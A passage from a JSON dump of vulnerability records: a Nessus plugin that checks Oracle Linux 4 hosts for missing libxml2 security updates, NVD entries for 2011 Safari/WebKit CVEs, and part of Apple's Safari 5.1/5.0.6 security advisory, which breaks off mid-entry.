application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2011-0216)\n\nA flaw was found in the way libxml2 parsed certain XPath expressions.\nIf an attacker were able to supply a specially crafted XML file to an application using libxml2, as well as an XPath expression for that application to run against the crafted file, it could cause the application to crash. (CVE-2011-2834)\n\nNote: Red Hat does not ship any applications that use libxml2 in a way that would allow the CVE-2011-2834 flaw to be exploited; however, third-party applications may allow XPath expressions to be passed which could trigger this flaw.\n\nAn out-of-bounds memory read flaw was found in libxml2. A remote attacker could provide a specially crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash. (CVE-2011-3905)\n\nAll users of libxml2 are advised to upgrade to these updated packages, which contain backported patches to correct these issues. The desktop must be restarted (log out, then log back in) for this update to take effect.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2012-0016.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68428", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : libxml2 (ELSA-2012-0016)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0016 and \n# Oracle Linux Security Advisory ELSA-2012-0016 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68428);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-2834\", \"CVE-2011-3905\", \"CVE-2011-3919\");\n script_bugtraq_id(48832, 49658, 51084, 51300);\n script_xref(name:\"RHSA\", value:\"2012:0016\");\n\n script_name(english:\"Oracle Linux 4 : libxml2 (ELSA-2012-0016)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0016 :\n\nUpdated libxml2 packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe libxml2 library is a development toolbox providing the\nimplementation of various XML standards. One of those standards is the\nXML Path Language (XPath), which is a language for addressing parts of\nan XML document.\n\nA heap-based buffer overflow flaw was found in the way libxml2 decoded\nentity references with long names. A remote attacker could provide a\nspecially crafted XML file that, when opened in an application linked\nagainst libxml2, would cause the application to crash or, potentially,\nexecute arbitrary code with the privileges of the user running the\napplication. (CVE-2011-3919)\n\nAn off-by-one error, leading to a heap-based buffer overflow, was\nfound in the way libxml2 parsed certain XML files. A remote attacker\ncould provide a specially crafted XML file that, when opened in an\napplication linked against libxml2, would cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2011-0216)\n\nA flaw was found in the way libxml2 parsed certain XPath expressions.\nIf an attacker were able to supply a specially crafted XML file to an\napplication using libxml2, as well as an XPath expression for that\napplication to run against the crafted file, it could cause the\napplication to crash. (CVE-2011-2834)\n\nNote: Red Hat does not ship any applications that use libxml2 in a way\nthat would allow the CVE-2011-2834 flaw to be exploited; however,\nthird-party applications may allow XPath expressions to be passed\nwhich could trigger this flaw.\n\nAn out-of-bounds memory read flaw was found in libxml2. A remote\nattacker could provide a specially crafted XML file that, when opened\nin an application linked against libxml2, would cause the application\nto crash. (CVE-2011-3905)\n\nAll users of libxml2 are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The desktop\nmust be restarted (log out, then log back in) for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-January/002547.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"libxml2-2.6.16-12.9.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libxml2-devel-2.6.16-12.9.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libxml2-python-2.6.16-12.9.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-devel / libxml2-python\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2016-09-03T15:13:19", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-20T22:53:27", "published": "2011-07-21T19:55:02", "id": "CVE-2011-1453", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1453", "type": "cve", "title": "CVE-2011-1453", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T14:54:43", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-20T22:51:31", "published": "2011-07-21T19:55:02", "id": "CVE-2011-0233", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0233", "type": "cve", "title": "CVE-2011-0233", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T15:13:24", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-20T22:53:28", "published": "2011-07-21T19:55:02", "id": "CVE-2011-1462", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1462", "type": "cve", "title": "CVE-2011-1462", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T13:46:38", "bulletinFamily": "NVD", "description": "CFNetwork in Apple Safari before 5.0.6 on Windows allows remote web servers to execute arbitrary code by replaying the NTLM credentials of a client user, related to a \"credential reflection\" issue.", "modified": "2011-07-22T00:00:00", "published": "2011-07-21T19:55:01", "id": "CVE-2010-1383", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1383", "type": "cve", "title": "CVE-2010-1383", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T14:54:45", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-20T22:51:32", "published": "2011-07-21T19:55:02", "id": "CVE-2011-0234", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0234", "type": "cve", "title": "CVE-2011-0234", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T15:10:49", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-20T22:53:11", "published": "2011-07-21T19:55:02", "id": "CVE-2011-1288", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1288", "type": "cve", "title": "CVE-2011-1288", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T14:54:28", "bulletinFamily": "NVD", "description": "Apple Safari before 5.0.6 allows remote attackers to bypass the Same Origin Policy, and modify the rendering of text from arbitrary web sites, via a Java applet that loads fonts.", "modified": "2011-07-22T00:00:00", "published": "2011-07-21T19:55:01", "id": "CVE-2011-0219", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0219", "type": "cve", "title": "CVE-2011-0219", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-03T14:54:49", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0.6 allows remote attackers to inject arbitrary web script or HTML via vectors involving a URL that contains a username.", "modified": "2011-10-20T22:51:32", "published": "2011-07-21T19:55:02", "id": "CVE-2011-0242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0242", "type": "cve", "title": "CVE-2011-0242", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-03T14:55:00", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-13T22:50:04", "published": "2011-07-21T19:55:02", "id": "CVE-2011-0253", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0253", "type": "cve", "title": "CVE-2011-0253", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T14:55:00", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-20T22:51:34", "published": "2011-07-21T19:55:02", "id": "CVE-2011-0254", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0254", "type": "cve", "title": "CVE-2011-0254", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:43", "bulletinFamily": "software", "description": "WebKit and Apple libraries multiple security vulnerabilities", "modified": "2011-08-01T00:00:00", "published": "2011-08-01T00:00:00", "id": "SECURITYVULNS:VULN:11798", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11798", "title": "WebKit / Apple Safari / Google Chrome multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2011-07-20-1 Safari 5.1 and Safari 5.0.6\r\n\r\nSafari 5.1 and Safari 5.0.6 are now available and address the\r\nfollowing:\r\n\r\nCFNetwork\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to a cross-\r\nsite scripting attack\r\nDescription: In certain situations, Safari may treat a file as HTML,\r\neven if it is served with the 'text/plain' content type. This may\r\nlead to a cross-site scripting attack on sites that allow untrusted\r\nusers to post text files. This issue is addressed through improved\r\nhandling of 'text/plain' content.\r\nCVE-ID\r\nCVE-2010-1420 : Hidetake Jo working with Microsoft Vulnerability\r\nResearch (MSVR), Neal Poole of Matasano Security\r\n\r\nCFNetwork\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Authenticating to a maliciously crafted website may lead to\r\narbitrary code execution\r\nDescription: The NTLM authentication protocol is susceptible to a\r\nreplay attack referred to as credential reflection. Authenticating to\r\na maliciously crafted website may lead to arbitrary code execution.\r\nTo mitigate this issue, Safari has been updated to utilize protection\r\nmechanisms recently added to Windows. This issue does not affect Mac\r\nOS X systems.\r\nCVE-ID\r\nCVE-2010-1383 : Takehiro Takahashi of IBM X-Force Research\r\n\r\nCFNetwork\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: A root certificate that is disabled may still be trusted\r\nDescription: CFNetwork did not properly validate that a certificate\r\nwas trusted for use by a SSL server. As a result, if the user had\r\nmarked a system root certificate as not trusted, Safari would still\r\naccept certificates signed by that root. This issue is addressed\r\nthrough improved certificate validation. This issue does not affect\r\nMac OS X systems.\r\nCVE-ID\r\nCVE-2011-0214 : An anonymous reporter\r\n\r\nColorSync\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted image with an embedded\r\nColorSync profile may lead to an unexpected application termination\r\nor arbitrary code execution\r\nDescription: An integer overflow existed in the handling of images\r\nwith an embedded ColorSync profile, which may lead to a heap buffer\r\noverflow. Opening a maliciously crafted image with an embedded\r\nColorSync profile may lead to an unexpected application termination\r\nor arbitrary code execution. For Mac OS X v10.5 systems, this issue\r\nis addressed in Security Update 2011-004.\r\nCVE-ID\r\nCVE-2011-0200 : binaryproof working with TippingPoint's Zero Day\r\nInitiative\r\n\r\nCoreFoundation\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Applications that use the CoreFoundation framework may be\r\nvulnerable to an unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An off-by-one buffer overflow issue existed in the\r\nhandling of CFStrings. Applications that use the CoreFoundation\r\nframework may be vulnerable to an unexpected application termination\r\nor arbitrary code execution. For Mac OS X v10.6 systems, this issue\r\nis addressed in Mac OS X v10.6.8.\r\nCVE-ID\r\nCVE-2011-0201 : Harry Sintonen\r\n\r\nCoreGraphics\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Opening a maliciously crafted PDF file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: An integer overflow issue existed in the handling of\r\nType 1 fonts. Viewing or downloading a document containing a\r\nmaliciously crafted embedded font may lead to arbitrary code\r\nexecution. For Mac OS X v10.6 systems, this issue is addressed in Mac\r\nOS X v10.6.8. For Mac OS X v10.5 systems, this issue is addressed in\r\nSecurity Update 2011-004.\r\nCVE-ID\r\nCVE-2011-0202 : Cristian Draghici of Modulo Consulting, Felix Grobert\r\nof the Google Security Team\r\n\r\nInternational Components for Unicode\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Applications that use ICU may be vulnerable to an unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A buffer overflow issue existed in ICU's handling of\r\nuppercase strings. Applications that use ICU may be vulnerable to an\r\nunexpected application termination or arbitrary code execution. For\r\nMac OS X v10.6 systems, this issue is addressed in Mac OS X v10.6.8.\r\nCVE-ID\r\nCVE-2011-0206 : David Bienvenu of Mozilla\r\n\r\nImageIO\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in ImageIO's handling of\r\nTIFF images. Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution. For\r\nMac OS X v10.6 systems, this issue is addressed in Mac OS X v10.6.8.\r\nFor Mac OS X v10.5 systems, this issue is addressed in Security\r\nUpdate 2011-004.\r\nCVE-ID\r\nCVE-2011-0204 : Dominic Chell of NGS Secure\r\n\r\nImageIO\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in ImageIO's handling of\r\nCCITT Group 4 encoded TIFF images. Viewing a maliciously crafted TIFF\r\nimage may lead to an unexpected application termination or arbitrary\r\ncode execution.\r\nCVE-ID\r\nCVE-2011-0241 : Cyril CATTIAUX of Tessi Technologies\r\n\r\nImageIO\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A reentrancy issue existed in ImageIO's handling of\r\nTIFF images. Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution. This\r\nissue does not affect Mac OS X systems.\r\nCVE-ID\r\nCVE-2011-0215 : Juan Pablo Lopez Yacubian working with iDefense VCP\r\n\r\nImageIO\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in ImageIO's handling of\r\nTIFF images. Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution. For\r\nMac OS X v10.6 systems, this issue is addressed in Mac OS X v10.6.8.\r\nFor Mac OS X v10.5 systems, this issue is addressed in Security\r\nUpdate 2011-004.\r\nCVE-ID\r\nCVE-2011-0204 : Dominic Chell of NGS Secure\r\n\r\nlibxslt\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to the\r\ndisclosure of addresses on the heap\r\nDescription: libxslt's implementation of the generate-id() XPath\r\nfunction disclosed the address of a heap buffer. Visiting a\r\nmaliciously crafted website may lead to the disclosure of addresses\r\non the heap. This issue is addressed by generating an ID based on the\r\ndifference between the addresses of two heap buffers. For Mac OS X\r\nv10.6 systems, this issue is addressed in Mac OS X v10.6.8. For Mac\r\nOS X v10.5 systems, this issue is addressed in Security Update\r\n2011-004.\r\nCVE-ID\r\nCVE-2011-0195 : Chris Evans of the Google Chrome Security Team\r\n\r\nlibxml\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A one-byte heap buffer overflow existed in libxml's\r\nhandling of XML data. Visiting a maliciously crafted website may lead\r\nto an unexpected application termination or arbitrary code execution.\r\nCVE-ID\r\nCVE-2011-0216 : Billy Rios of the Google Security Team\r\n\r\nSafari\r\nAvailable for: Mac OS X v10.6.8 or later,\r\nMac OS X Server v10.6.8 or later, Windows 7, Vista, XP SP2 or later\r\nImpact: If the "AutoFill web forms" feature is enabled, visiting a\r\nmaliciously crafted website and typing may lead to the disclosure of\r\ninformation from the user's Address Book\r\nDescription: Safari's "AutoFill web forms" feature filled in non-\r\nvisible form fields, and the information was accessible by scripts on\r\nthe site before the user submitted the form. This issue is addressed\r\nby displaying all fields that will be filled, and requiring the\r\nuser's consent before AutoFill information is available to the form.\r\nCVE-ID\r\nCVE-2011-0217 : Florian Rienhardt of BSI, Alex Lambert, [Jeremiah\r\nGrossman]\r\n\r\nSafari\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: With a certain Java configuration, visiting a malicious\r\nwebsite may lead to unexpected text being displayed on other sites\r\nDescription: A cross origin issue existed in the handling of Java\r\nApplets. This applies when Java is enabled in Safari, and Java is\r\nconfigured to run within the browser process. Fonts loaded by a Java\r\napplet could affect the display of text content from other sites.\r\nThis issue is addressed by running Java applets in a separate\r\nprocess.\r\nCVE-ID\r\nCVE-2011-0219 : Joshua Smith of Kaon Interactive\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in WebKit.\r\nVisiting a maliciously crafted website may lead to an unexpected\r\napplication termination or arbitrary code execution.\r\nCVE-ID\r\nCVE-2010-1823 : David Weston of Microsoft and Microsoft Vulnerability\r\nResearch (MSVR), wushi of team509, and Yong Li of Research In Motion\r\nLtd\r\nCVE-2011-0164 : Apple\r\nCVE-2011-0218 : SkyLined of Google Chrome Security Team\r\nCVE-2011-0221 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0222 : Nikita Tarakanov and Alex Bazhanyuk of the CISS\r\nResearch Team, and Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0223 : Jose A. Vazquez of spa-s3c.blogspot.com working with\r\niDefense VCP\r\nCVE-2011-0225 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0232 : J23 working with TippingPoint's Zero Day Initiative\r\nCVE-2011-0233 : wushi of team509 working with TippingPoint's Zero Day\r\nInitiative\r\nCVE-2011-0234 : Rob King working with TippingPoint's Zero Day\r\nInitiative, wushi of team509 working with TippingPoint's Zero Day\r\nInitiative, wushi of team509 working with iDefense VCP\r\nCVE-2011-0235 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0237 : wushi of team509 working with iDefense VCP\r\nCVE-2011-0238 : Adam Barth of Google Chrome Security Team\r\nCVE-2011-0240 : wushi of team509 working with iDefense VCP\r\nCVE-2011-0253 : Richard Keen\r\nCVE-2011-0254 : An anonymous researcher working with TippingPoint's\r\nZero Day Initiative\r\nCVE-2011-0255 : An anonymous researcher working with TippingPoint's\r\nZero Day Initiative\r\nCVE-2011-0981 : Rik Cabanier of Adobe Systems, Inc\r\nCVE-2011-0983 : Martin Barbella\r\nCVE-2011-1109 : Sergey Glazunov\r\nCVE-2011-1114 : Martin Barbella\r\nCVE-2011-1115 : Martin Barbella\r\nCVE-2011-1117 : wushi of team509\r\nCVE-2011-1121 : miaubiz\r\nCVE-2011-1188 : Martin Barbella\r\nCVE-2011-1203 : Sergey Glazunov\r\nCVE-2011-1204 : Sergey Glazunov\r\nCVE-2011-1288 : Andreas Kling of Nokia\r\nCVE-2011-1293 : Sergey Glazunov\r\nCVE-2011-1296 : Sergey Glazunov\r\nCVE-2011-1449 : Marek Majkowski, wushi of team 509 working with\r\niDefense VCP\r\nCVE-2011-1451 : Sergey Glazunov\r\nCVE-2011-1453 : wushi of team509 working with TippingPoint's Zero Day\r\nInitiative\r\nCVE-2011-1457 : John Knottenbelt of Google\r\nCVE-2011-1462 : wushi of team509\r\nCVE-2011-1797 : wushi of team509\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: A configuration issue existed in WebKit's use of\r\nlibxslt. Visiting a maliciously crafted website may lead to arbitrary\r\nfiles being created with the privileges of the user, which may lead\r\nto arbitrary code execution. This issue is addressed through improved\r\nlibxslt security settings.\r\nCVE-ID\r\nCVE-2011-1774 : Nicolas Gregoire of Agarri\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to an\r\ninformation disclosure\r\nDescription: A cross-origin issue existed in the handling of Web\r\nWorkers. Visiting a maliciously crafted website may lead to an\r\ninformation disclosure.\r\nCVE-ID\r\nCVE-2011-1190 : Daniel Divricean of divricean.ro\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to a cross-\r\nsite scripting attack\r\nDescription: A cross-origin issue existed in the handling of URLs\r\nwith an embedded username. Visiting a maliciously crafted website may\r\nlead to a cross-site scripting attack. This issue is addressed\r\nthrough improved handling of URLs with an embedded username.\r\nCVE-ID\r\nCVE-2011-0242 : Jobert Abma of Online24\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to a cross-\r\nsite scripting attack\r\nDescription: A cross-origin issue existed in the handling of DOM\r\nnodes. Visiting a maliciously crafted website may lead to a cross-\r\nsite scripting attack.\r\nCVE-ID\r\nCVE-2011-1295 : Sergey Glazunov\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: A maliciously crafted website may be able to cause a\r\ndifferent URL to be shown in the address bar\r\nDescription: A URL spoofing issue existed in the handling of the DOM\r\nhistory object. A maliciously crafted website may have been able to\r\ncause a different URL to be shown in the address bar.\r\nCVE-ID\r\nCVE-2011-1107 : Jordi Chancel\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: Subscribing to a maliciously crafted RSS feed and clicking\r\non a link within it may lead to an information disclosure\r\nDescription: A canonicalization issue existed in the handling of\r\nURLs. Subscribing to a maliciously crafted RSS feed and clicking on a\r\nlink within it may lead to arbitrary files being sent from the user's\r\nsystem to a remote server. This update addresses the issue through\r\nimproved handling of URLs.\r\nCVE-ID\r\nCVE-2011-0244 : Jason Hullinger\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: Applications that use WebKit, such as mail clients, may\r\nconnect to an arbitrary DNS server upon processing HTML content\r\nDescription: DNS prefetching was enabled by default in WebKit.\r\nApplications that use WebKit, such a s mail clients, may connect to\r\nan arbitrary DNS server upon processing HTML content. This update\r\naddresses the issue by requiring applications to opt in to DNS\r\nprefetching.\r\nCVE-ID\r\nCVE-2010-3829 : Mike Cardwell of Cardwell IT 